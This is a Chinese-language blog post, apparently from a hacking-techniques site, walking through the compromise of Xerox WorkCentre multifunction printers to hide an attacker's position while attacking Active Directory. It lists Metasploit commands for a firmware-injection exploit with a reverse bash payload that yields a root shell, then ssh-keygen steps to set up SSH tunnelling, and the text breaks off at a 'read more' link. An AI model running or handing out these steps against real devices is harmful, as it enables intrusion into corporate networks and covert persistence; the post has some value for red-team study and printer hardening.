针对打印机的APT攻击

作者:Secer 发布时间:January 12, 2016 分类:黑客技巧

一直以来我们都在讨论多功能打印机(MFP)在企业环境下所带来的风险,以及攻击者如何轻易的利用其来进行恶意攻击,比如通过LDAP提取Windows Active Directory的证书或者滥用“扫描文件”和“扫描电子邮件”功能。

而在最近一次我们的攻防演练中,在通过MFP设备攻击Windows Active Directory时,我们利用该设备隐藏了我们的位置,这使得针对MFP设备的攻击进入了新的阶段。在本文中我们就来分享一下如何利用被盗用的Xerox Workcentre MFP设备来进行APT的细节。

clip_image001

首先我们要确定该Xerox Workcentre MFP设备在已经被入侵的网络中很容易受到固件注入攻击。实际上该技术早在2012年就已经被发表了,但由于缺乏对这一类物联网设备的强制性更新,目前仍有大量的Xerox Workcentre MFP设备会受到这种攻击,这一点可以很容易的通过Metasploit中的xerox_mfp模块来进行验证。而如果设备并不容易遭受攻击,或者攻击的结果只能够进行打印等操作,那显然是毫无价值的。但是如果它存在严重漏洞可以使你获得反向shell并最终拿到该设备的Root权限,那就相当的有价值了。

以下将向您展示通过Metasploit中的xerox_mfp模块来实施此类攻击。

[1]在Metasploit中选择 xerox_mfp 模块:

Use exploit/unix/misc/xerox_mfp

(http://www.rapid7.com/db/modules/exploit/unix/misc/xerox_mfp)

[2]接下来选择反向 bash payload 模块并使用它:

Set payload cmd/unix/reverse_bash

[3]最后使用以下命令设置目标IP和本地IP:

set RHOST ipaddress

set LHOST ipaddress

[4]这里建议你设置 wfsdelay 到30,因为当你在进行攻击时打印机有可能进入睡眠模式,这样做可以在你等待会话连接到监听器时增加延时。

set wfsdelay 30

[5]一旦完成上面的操作,你就可以通过输入或者运行exploit来启动exploit。

Xerox exploit将会启动固件注入攻击并返回一个可以接入MFP root权限的远程shell。

如下图所示:

clip_image002

建立并启用SSHD

当你获得了该MFP设备的root访问权限后,需要进行一些必要的配置,以便能够启用SSH隧道。第一步是建立SSH主机密钥,使你可以启动MFP设备上的SSH进程。

具体步骤如下:

输入以下命令来生成dsa和rsa密钥对:

ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key

ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key

当有提示要输入密码时直接回车,下图是生成密钥的一个例子:

clip_image003

阅读剩余部分...